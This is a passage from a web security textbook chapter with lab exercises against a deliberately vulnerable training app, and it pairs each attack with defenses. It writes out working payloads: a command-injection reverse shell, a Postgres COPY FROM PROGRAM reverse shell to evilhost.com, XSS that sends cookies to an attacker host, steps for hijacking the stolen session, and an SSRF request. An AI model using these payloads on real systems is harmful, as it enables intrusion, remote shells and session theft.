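    result = subprocess.run(["echo", "resizing to", scale + "%"],
                            capture_output=True, text=True)
    return result.stdout


print(resize_args("50"))
print(echo_without_shell("50% newimage.jpg && echo INJECTED #"))
```

The returned list would be passed straight to subprocess.run(). An attacker's string such as the one shown never gets that far, because int() rejects it.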

Command Injection

The Coffeeshop application has a command injection vulnerability in the contact form. Visit the Coffeeshop URL at

http://10.50.0.2

and click Contact in the menu bar at the top. You will have to log in if you have not done so already.

Enter a message and click Send. Visit MailCatcher at
http://10.50.0.2:1080

and you should see your message.

Now connect to your CSThirdparty VM with
vagrant ssh
from the csthirdparty/vagrant directory and start an nc session:
nc -l 9000
We will initiate a reverse shell in the same way as the example shown previously, using the vulnerable contact form. Enter the following in the message body:
" && bash -c 'bash -i >& /dev/tcp/10.50.0.3/9000 0>&1' #

Take a look at the code in the contact() function in views.py to see how this works. Execute the code by sending the email.

Once the reverse shell is established, try some commands like
whoami
ls
ps x
cat /etc/passwd

End the shell session with Ctrl-C. Note that, because the Bash session is interactive, the web page will not finish loading until you quit the reverse shell.

The solution to this exercise is in coffeeshop/vagrant/snippets/injection.txt.

Combining SQL and Command Injection

The previous example required a command injection vulnerability to be present. If there isn’t one, a reverse shell can sometimes be obtained through SQL injection. Many databases, Postgres included, allow shell commands to be executed from SQL queries. In Postgres, this is disabled by default except for superusers (which is another reason for your web application not to use a superuser account to access the database).

If command execution is enabled and a SQL injection vulnerability is present, the following text in a vulnerable field will start a reverse shell:
'; CREATE TABLE trigger_test (
       tt_id serial PRIMARY KEY,
       command_output text
   );
   COPY trigger_test (command_output) FROM PROGRAM
      'bash -c ''bash -i >& /dev/tcp/evilhost.com/9000 0>&1 &''';
   --

For clarity, we have split the command onto several lines. In a real attack, it would be entered without the carriage returns.

The COPY … FROM PROGRAM command is Postgres’ syntax for running a shell command. The output is copied into a table. Of course, we need a table to copy it into, so we create the table first.

For our reverse shell, we are not interested in the output, so we don’t care if we can read the table or not (though we can with further SQL injection commands). We just want the command to be run so that it connects to our nc server.

Clearly, allowing the web application’s database user to run shell commands is dangerous, and this feature should be disabled in all but very specialist applications.
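
Removing the SQL injection vulnerability itself also closes this route. The following is a minimal sketch of a parameterized query, assuming Python's built-in sqlite3 module as a stand-in for Postgres so that it runs without a database server. The comments table and the payload are hypothetical.

```python
import sqlite3

# sqlite3 stands in for Postgres here so the sketch runs without a server.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT)")

# Hypothetical attacker input that tries to end the statement and add another.
payload = "'; CREATE TABLE trigger_test (command_output text); --"

# The placeholder sends the value separately from the SQL text, so the
# payload is stored as data and never parsed as SQL.
conn.execute("INSERT INTO comments (body) VALUES (?)", (payload,))

stored = conn.execute("SELECT body FROM comments").fetchone()[0]
tables = [row[0] for row in conn.execute(
    "SELECT name FROM sqlite_master WHERE type = 'table'")]
print(stored == payload, tables)
```

Because the payload never becomes part of the SQL text, the injected CREATE TABLE statement is not executed and only the comments table exists afterward.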

7.6 Server-Side Request Forgery

One of the more well-known web vulnerabilities is cross-site request forgery (CSRF), which we will discuss in detail in Chapter 8. Server-side request forgery (SSRF) is a relatively new attack and, despite its similar name, has less in common with cross-site request forgery and more with injection attacks.

SSRF vulnerabilities occur when a client's request to a server contains another request embedded in it, or enough of a request fragment that an attacker can craft input that causes the server to make a request the developer did not intend to make available. The attack is possible because the embedded request is made from within the server’s network, not from the outside Internet.

Imagine you have a shop that aggregates products from different sites. You make a REST API call available to the client so that it can request products from the different sites. A request looks something like
POST /product HTTP/1.1
Content-Type: application/json
{"url": "https://shop1.com/product/1"}
If the embedded URL is not sanitized, an attacker can take advantage of it to call services behind the web server’s firewall that are unavailable when called from outside the corporate network. Say the organization has an admin console running on port 9000 of the same host, and this port is blocked by the firewall. An attacker can send a request:
POST /product HTTP/1.1
Content-Type: application/json
{"url": "https://localhost:9000/admin"}

Since the embedded call is made from within the intranet, port 9000 on localhost is not blocked. If the administrators assumed that only authorized users have access to this port and therefore do not protect it with a username and password, the attacker can gain access without needing to authenticate.

This may sound like a rather obvious vulnerability, yet it exists in the real world. One existed in GitLab until June 2021 when it was patched.3 An embedded URL similar to the preceding situation was made available to integrate GitHub projects with GitLab. The vulnerability arose because attackers, even unauthenticated ones, could use the API call to make calls to other hosts internal to the network where the GitLab instance was running.

Defending Against Server-Side Request Forgery

The best defense against SSRF is to not make requests based on the contents of client-supplied requests, at least not without first sanitizing the request. If you must make this functionality available, ensure the host, port, protocol, and path match some criteria.
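
One way to check the host, port, protocol, and path is sketched below, using Python's standard urllib.parse module. The allowlist, the path prefix, and the function name is_allowed_url are assumptions made for illustration, based on the product aggregator example. A real application would choose its own criteria.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the only upstream shops this API may call.
ALLOWED_HOSTS = {"shop1.com", "shop2.com"}
ALLOWED_PATH_PREFIX = "/product/"


def is_allowed_url(url: str) -> bool:
    """Return True only if protocol, host, port, and path all match."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError for a malformed port
    except ValueError:
        return False
    if parts.scheme != "https":
        return False
    if parts.hostname not in ALLOWED_HOSTS:
        return False
    if port not in (None, 443):
        return False
    # Reject embedded credentials such as https://shop1.com@localhost/
    if parts.username or parts.password:
        return False
    # Reject attempts to climb out of the permitted path.
    if ".." in parts.path:
        return False
    return parts.path.startswith(ALLOWED_PATH_PREFIX)


print(is_allowed_url("https://shop1.com/product/1"))
print(is_allowed_url("https://localhost:9000/admin"))
```

An allowlist is used rather than a blocklist because it is hard to enumerate every way of writing an internal address. This sketch only validates the URL string. It does not cover redirects returned by the remote host or a hostname that resolves to an internal address, which would need separate handling.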

7.7 Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a vulnerability that occurs when an attacker is able to get their own JavaScript code sent by a server in a response and executed by the browser. There are three types:
  1. Reflected XSS, where JavaScript code is transient rather than being stored on the server

  2. Stored XSS, where the JavaScript is stored on the server

  3. DOM-based XSS, where only the DOM environment is changed rather than actually changing code

There is also Blind XSS, where JavaScript code is executed in a context that does not update the screen, for example, an asynchronous request. It is similar to Stored XSS except for being more difficult to test for.

An attacker’s aim might be to have the code executed in their own browser, but more commonly the aim is to have it executed in a victim’s browser.

XSS vulnerabilities are attractive to attackers because the JavaScript code is run in the context of the vulnerable site and is run by the victim on their own browser.

Reflected XSS

Before looking more closely at the impact XSS can have, let us look at some examples. Recall the example in Section 7.4 where we considered a vulnerable search form field. Imagine the results page contains the search term as well as the matches, for example:
Products matching searchterm:
Match 1
Match 2
...
Say an attacker entered, as the search term
<script>
some malicious JavaScript code
</script>

Then, when the search results are displayed, the page will contain the JavaScript, enclosed in legal HTML <script></script> tags, and would therefore be executed.

This is an example of Reflected XSS. The JavaScript is not stored on the server but is sent to the browser in the response and executed there.

The code is only executed in the attacker’s browser. Other users do not receive the code. This may still have a harmful impact if the developer assumed certain JavaScript code would or would not be executed, for example, client-side form validation.

However, if this is the goal of the attacker, there is an easier way to have JavaScript code executed in their browser: by editing the HTTP response before it reaches the browser. We will do this in the next exercise.

Using HTTP Toolkit to Alter JavaScript

If you followed the setup instructions in Chapter 2, you should have HTTP Toolkit installed. We will use this to intercept and alter requests from our Coffeeshop application.

Start HTTP Toolkit. Click on the button labelled Chrome Intercept a fresh independent Chrome window. This will open a new Chrome instance. Return to HTTP Toolkit and click on the Mock icon in the menu bar on the left. We can use this tab to add rules when websites are visited.

The creation of a matcher in the HTTP toolkit is depicted in a screenshot. On the left, there are options for intercept, view, and mock, and on the right, there is a match screen.

Figure 7-1

Creating a matcher in HTTP Toolkit

Click on the + Add a new rule to rewrite requests or responses button. In the Match drop-down, select Any requests, and in the Then drop-down, select Pause the response to manually edit it.

Under Any requests, you will see another drop-down titled Add another matcher and a Plus button. Click the drop-down and select For a URL. Enter our Coffeeshop application root URL underneath, http://10.50.0.2/. Your window should look like Figure 7-1. Now click on the Plus button to save the matcher and then the Save button to save the rule.

You can now return to the Chrome window HTTP Toolkit opened and visit our website, http://10.50.0.2/. HTTP Toolkit will pause before the response is displayed. Return to the HTTP Toolkit. On the left you will see a list of requests Chrome has made. On the right you will see the response it is currently loading. Scroll down to the bottom of the response, down to just above the </body> tag, and enter some JavaScript:
<script>
alert(document.cookie);
</script>
Your window should look like Figure 7-2. Now click on the Resume button. Chrome will finish loading the page and execute your JavaScript, displaying your session ID and CSRF token cookies.

A screenshot displays the interception of a response with the HTTP Toolkit. It has 3 options at the left: intercept, view, and mock. On the right is the page with information about the method, status, source, host, and post and query.

Figure 7-2

Intercepting a response with HTTP Toolkit

You can now close HTTP Toolkit. It will also close the Chrome window.

Hackers are less interested in their own cookies than in other people’s and so are more likely to try to get JavaScript code executed by a victim’s browser, not their own.

One way would be to send a victim a link to a page with a reflected XSS vulnerability, crafting the link to contain malicious JavaScript. The Coffeeshop application has a vulnerable page to display a product, using the URL

http://10.50.0.2/prod/?id=productid

If the URL is called with a valid product ID, for example:

http://10.50.0.2/prod/?id=1

then the product is displayed. If an invalid one is provided, it displays an error message stating that the requested ID was not found. Since the user input is displayed unchanged, setting it to a script, for example:

http://10.50.0.2/prod/?id=%3Cscript%3Ealert%28%22Hacked%22%29%3C%2Fscript%3E

will cause the URL-decoded script
<script>alert("Hacked")</script>

to be pasted into the page and executed. If this is emailed to a victim, it will be executed in their browser. You can try this on your Coffeeshop instance and verify that it works.

Another way to get someone else to execute your JavaScript is to get it stored on the server. This is where Stored XSS comes in.

Stored XSS

Sometimes, user input is persisted in an application’s database and then displayed in HTML pages. Examples include social media posts, blog posts, product reviews, and so on. If an attacker can get malicious JavaScript code stored there, it will be executed whenever another user visits the page that displays that input. It will be executed as that user, with that user’s cookies.

Our Coffeeshop application has one such vulnerability, in a form where users can leave comments about products. We will exploit this in the next exercise.

Exploiting a Stored XSS Vulnerability

Visit the Coffeeshop application at http://10.50.0.2 in Chrome. Log in as bob (see the file coffeeshop/secrets/config.env for the password). Now click on any of the products to see the details page.

If you are logged in, you will see a box to enter a comment at the bottom of the page. Enter
Nice coffee
<script>
alert(document.cookie)
</script>

Now reload the page. You will see the alert pop up with your session ID and the CSRF cookie. If you log out and log in again as alice, then her cookies will be displayed.

Showing a user their own cookie is not much of a risk. An attacker prefers to have the cookie sent to them. One option is for the attacker to create a web service with a GET URL that saves cookies passed in the URL. They simply create a comment with some JavaScript to call this URL using the document.cookie value. Whenever a user views that comment, the URL will be called, sending their cookies to the attacker.

We have one such URL in our CSThirdparty application:
http://10.50.0.3/cookies/cookie-value

Take a look at the code in the views.py file for CSThirdparty. The function is called cookies() and is quite simple.

One easy way of getting a GET URL called in JavaScript is to create an <img> tag and set the source to our URL:
var i = document.createElement("img");
i.src = "http://... ";

There are other approaches, but this one is short and synchronous, avoiding potential issues such as short comment fields in the database.

XSS to Send Cookies to an Attacker

The code for this exercise is in coffeeshop/vagrant/snippets/xss.txt.

Still in Chrome as user bob, delete your comment with the Delete button. Using the preceding img tag approach, we will create a new one using the JavaScript shown before to call
http://10.50.0.3/cookies/cookie-value

with the cookies in document.cookie.

Enter the following as a product comment:
Nice coffee
<script>
var i = document.createElement("img");
i.src = "http://10.50.0.3/cookies/" + document.cookie;
</script>

Because the comment also contains ordinary text, no one viewing the rendered page will see any sign that their cookies have been stolen.

Reload the page and then have a look in the csthirdparty database. The easiest way is to log into your CSThirdparty VM with
vagrant ssh
from the csthirdparty/vagrant directory and then connect to the database with
sudo -u postgres psql csthirdparty
You should find the user’s cookies in the csthirdparty_cookies table with
select * from csthirdparty_cookies;

Exploiting the Stolen Cookie

An attacker can use the stolen session ID cookie to log in as the user it belongs to. Log out from the Coffeeshop application and reload the page. Now open the Developer Tools by clicking the three vertical dots in the top-right corner of the browser; then select More Tools followed by Developer Tools. Click on the Console icon. Type the following:
document.cookie="sessionid=session-id-from-database"

substituting the session ID value from the cookie you saved in the CSThirdparty database.

Now refresh the page and close the Developer Tools. You should find that you are now logged in as bob.

To clean up, delete the comment again. You can also delete the cookies from the database.

DOM-Based XSS

DOM-based XSS vulnerabilities occur when an attacker can submit JavaScript (through GET parameters, form input, etc.) that is used when modifying the DOM programmatically, for example, using innerHTML.

Consider, for example, a page for reporting an error. When the URL
http://example.com/error?errortext=error-message
is sent, the page is updated in JavaScript with
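var para = document.createElement("p");
para.innerHTML = errorText; // vulnerable: the text is parsed as HTML
var errors = document.getElementById("errors");
errors.appendChild(para);

Here, errorText is the text coming from the URL.

If the text is not sanitized and an attacker includes markup that carries JavaScript, for example, an <img> tag with an onerror handler, that JavaScript code will be executed when the text is added to the DOM. Browsers do not run a <script> tag inserted through innerHTML, but they do run event-handler attributes. Building the paragraph with document.createTextNode(errorText) instead would treat the input as plain text.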

A page like this might exist in an application where there is no server-side rendering. It therefore relies on JavaScript to customize the contents.

Defending Against Cross-Site Scripting

Each of the XSS examples relies on user-submitted code being interpreted as HTML. The best defense is to ensure that it isn’t: remove or escape any HTML special characters such as <, >, and &.

This is not as easy as it might first appear. Like escaping URL-encoded input, there are several common mistakes that hackers know and can exploit. The best strategy is to use a well-established third-party library to do the escaping. Django has one built in.
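
As a small illustration of what escaping does, the sketch below uses html.escape() from the Python standard library on the payload from the reflected XSS example. It is shown only to make the transformation concrete. Django's template engine performs its own escaping, as described next.

```python
import html

# The payload from the reflected XSS example.
user_input = '<script>alert("Hacked")</script>'

# html.escape() replaces &, <, and > (and, by default, quote characters)
# with HTML entities so the browser displays the text instead of parsing it.
escaped = html.escape(user_input)
print(escaped)
```

The escaped string contains no literal < or > characters, so the browser renders it as visible text rather than as a script element.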

In fact, we had to deliberately disable Django’s HTML escaping as it is switched on by default. Take a look at the HTML template at
coffeeshopsite/coffeeshop/templates/coffeeshop/product.html
In the section underneath <h3>Comments</h3>, you will see the following line:
{{ comment.comment | safe }}

The braces {{ ... }} are Django’s syntax for variable substitution, so this prints the value of comment.comment.

By default, Django will escape this. We appended safe to indicate that we want Django to treat the variable as safe text and not to perform escaping. Variables containing user input, as in this case, should definitely not be treated as safe unless they have been escaped previously in back-end code.

There are additional defenses that specifically relate to session IDs (and CSRF cookies, which we will look at in the next chapter). Session IDs need special defenses because they contain sensitive information. As we saw in the last exercise, they perform the same function as a username and password and should therefore be treated as securely. The difference is they are designed to be disposable—we can invalidate a user session by deleting the server-side entry for that ID, and the only inconvenience is that the user will have to log in again.

We saw in Section 7.2 that we can place limitations on how a cookie is used when we send it to the client. The session-grabbing attack in the last exercise would have been prevented if we had set the HttpOnly parameter in the cookie. It would then be inaccessible to JavaScript. Other cookies would be sent to the attacker, but not the cookies created with HttpOnly.

And of course no cookies would be sent at all if we had escaped the HTML.
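
To show what these cookie parameters look like in the response header, here is a minimal sketch using http.cookies from the Python standard library. The session ID value is a placeholder, and a framework such as Django would normally build this header for you.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["sessionid"] = "example-session-id"  # placeholder value
cookie["sessionid"]["httponly"] = True   # hide the cookie from document.cookie
cookie["sessionid"]["secure"] = True     # only send over HTTPS
cookie["sessionid"]["samesite"] = "Lax"  # requires Python 3.8 or later
cookie["sessionid"]["path"] = "/"

# Render the Set-Cookie header line the server would send.
header = cookie.output()
print(header)
```

With the HttpOnly flag present, the browser still sends the cookie with requests but leaves it out of document.cookie.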

Django makes it particularly easy to change the settings for session ID cookies, using variables in settings.py. The key ones for security are given in Table 7-3.
Table 7-3. Django’s session cookie security variables

| Variable | Meaning | Default |
| --- | --- | --- |
| SESSION_COOKIE_AGE | Set the Max-Age parameter | 1209600 (2 weeks) |
| SESSION_COOKIE_DOMAIN | Set the domain the cookie will be sent for | None |
| SESSION_COOKIE_HTTPONLY | Set the HttpOnly flag (don’t make the cookie available in JavaScript) | True |
| SESSION_COOKIE_PATH | Set the path the cookie will be sent for | / |
| SESSION_COOKIE_SAMESITE | Set the cookie’s SameSite value | Lax |
| SESSION_COOKIE_SECURE | Set the cookie’s Secure flag (only send over HTTPS) | False |

Looking at this table, it is clear that by default, the session ID should not have been sent by the malicious JavaScript. It was sent because we overrode SESSION_COOKIE_HTTPONLY in our settings.py.

Fixing the XSS Vulnerability
Firstly, delete the product comment we created in the previous exercise. Now, delete your session cookie from Chrome: select Settings from the three vertical dots menu at the top right of the browser, then select Privacy and security, then Cookies and other site data, then See all cookies and site data. Alternatively, enter the following in the address bar:
chrome://settings/siteData

Click on the delete icon next to 10.50.0.2. Visit or reload

http://10.50.0.2

We will fix the XSS vulnerability in the product comments using two methods:
  1. Change the session cookie settings in settings.py.

  2. Ensure that comment text is properly escaped in product.html.

For method 1, open settings.py and change the line
SESSION_COOKIE_HTTPONLY = False
to
SESSION_COOKIE_HTTPONLY = True

Restart Apache with sudo apachectl restart and log in as bob again. Create a new comment containing the alert() JavaScript that displays the cookie (see the exercise “Exploiting a Stored XSS Vulnerability”), reload the page, and confirm that the session ID cookie is not displayed.

Note that the CSRF token cookie will still be displayed as this setting applies to the session ID cookie only.

Delete the cookie before proceeding to method 2. Open product.html in
coffeeshop/vagrant/coffeeshopsite/coffeeshop/templates/coffeeshop
and change
{{ comment.comment | safe }}
to
{{ comment.comment }}

Restart Apache again with sudo apachectl restart, recreate the comment, reload, and confirm the JavaScript is not executed.

The solution to this exercise is in coffeeshop/vagrant/snippets/xss.txt.

HTML Injection

Before leaving XSS, we should discuss the related vulnerability of HTML injection. This occurs when an attacker can get HTML code interpreted as part of a page. We include it here rather than in the section on injection as it arises from the same vulnerability. The difference between this and Stored XSS is that the injected text is HTML not JavaScript.

Even without JavaScript code, HTML injection can be harmful. An attacker can deface a site by adding images with <img> tags or entire pages with <iframe> tags. They can create links that can be used to track visitors or deliver malware.

Defending against HTML injection is the same as against XSS—sanitize user input.

7.8 Content Sniffing

We looked at potential vulnerabilities of file uploading in Chapter 5. Among the defenses, we said developers should confirm that the file type matches what is expected.

It is possible for a file to simultaneously be valid syntax for more than one file type. These are called polyglot files. They can potentially be useful to attackers because of a feature in browsers that causes them to change the content type from what was given in the server’s HTTP response.

Consider the following example. An attacker wants to upload malicious JavaScript to a site. The only opportunity to get code onto the server is an image upload form (e.g., on a social media site). Perhaps the site filters JavaScript uploads using Content Security Policy (CSP), which we will discuss in Chapter 8.

The attacker constructs a file containing the malicious JavaScript that is also a valid JPEG file, calling it myimage.jpg. They then upload it using the image upload form. The server checks the content and confirms it is a JPEG file.

Later, the attacker is able to have the JavaScript/JPEG file linked to with the following HTML:
<script src="myimage.jpg"></script>

Most web servers derive the Content-Type header from the file extension. When the client requests myimage.jpg, the server looks at the extension and sends the image with Content-Type: image/jpeg. The script should fail to execute.

However, many browsers try to be clever and assume the server has made an error. The browser is expecting application/javascript but receives image/jpeg. Believing the server may have sent the wrong content type, it inspects the file to check if it is actually JavaScript. As the image is both valid JPEG and JavaScript, the browser will decide it is actually a script and will execute it.

This is a somewhat esoteric vulnerability, but it can be demonstrated to be exploitable. Gareth Heyes at PortSwigger demonstrated that he can create a file that is simultaneously valid JPEG and JavaScript.4 We have extended this idea to create a script that can join (more or less) arbitrary JPEG images and JavaScript files into one file, which is valid syntax for both.

If you look at your coffeeshop Git clone, you will see a directory called other/jpgjs containing this script along with an example. The JPEG/JavaScript file is hackedimage.jpg. It is a valid image of a Swiss mountain. It is also JavaScript that displays a message in an alert window.

Take a look at the file index.html. It displays the image with a conventional <img> tag:
<img src="hackedimage.jpg">
It also runs it as a script with
<script charset="ISO-8859-1"  src="hackedimage.jpg"></script>

Open the index.html file in Firefox. The image will be displayed, and the alert will pop up. Both come from the same file. It works in older versions of Chrome though not in the most recent ones.

It is arguable whether this vulnerability has been exploited in real life. However, it is such an easy one to fix, and the browser feature seems so unnecessary, that it is worth fixing anyway. The solution is to add a header
X-Content-Type-Options: nosniff

which instructs the browser not to perform this content inspection. It can be added to all responses.

In Django, the nosniff header is enabled and disabled with the SECURE_CONTENT_TYPE_NOSNIFF variable in settings.py. It is set to True by default, adding the preceding header to all responses.
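
Outside Django, the same header can be added in a few lines. The following is a minimal sketch of a WSGI middleware that does so. The names nosniff_middleware and image_app are hypothetical, and image_app merely stands in for whatever application serves the uploaded files.

```python
def nosniff_middleware(app):
    """Wrap a WSGI app so every response carries the nosniff header."""
    def wrapped(environ, start_response):
        def start_with_header(status, headers, exc_info=None):
            # Drop any existing value, then add ours.
            headers = [(k, v) for k, v in headers
                       if k.lower() != "x-content-type-options"]
            headers.append(("X-Content-Type-Options", "nosniff"))
            return start_response(status, headers, exc_info)
        return app(environ, start_with_header)
    return wrapped


def image_app(environ, start_response):
    # Hypothetical app that serves an uploaded image.
    start_response("200 OK", [("Content-Type", "image/jpeg")])
    return [b"...image bytes..."]


app = nosniff_middleware(image_app)
```

Wrapping the application at this level means the header is added to every response, which matches the advice above that it can safely be sent with all of them.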

7.9 Summary

Code that handles user input is a common source of vulnerabilities in web applications. We saw that it gives attackers the opportunity to have their own code executed on the server or by victims’ browsers.

We looked at how cookies work and how to set their parameters safely, for example, by giving appropriate values to the SameSite parameter.

We examined user input-oriented vulnerabilities and how to secure code against them.

Injection attacks exploit vulnerable user input-handling code. SQL injection attacks work by getting an attacker’s SQL code executed on the database through unsanitized input fields. Command injection attacks are similar, but the attacker’s input is executed as shell commands on the server. Code injection attacks seek to get code executed, for example, Python. We saw that input sanitization is the best defense against injection.

Server-side request forgery is an attack where a hacker can embed their request inside an API call and use it to reach services behind the server’s firewall.

We also looked at a client-side attack: cross-site scripting. In these attacks, a hacker aims to get their JavaScript code executed in a victim’s browser. The best defenses are sanitizing user input and safe use of cookie settings such as the HttpOnly parameter.

We ended the chapter by looking at how browsers’ content sniffing feature can be exploited.

In the next chapter, we look at cross-site requests: how to allow our server to access other sites without introducing vulnerabilities.
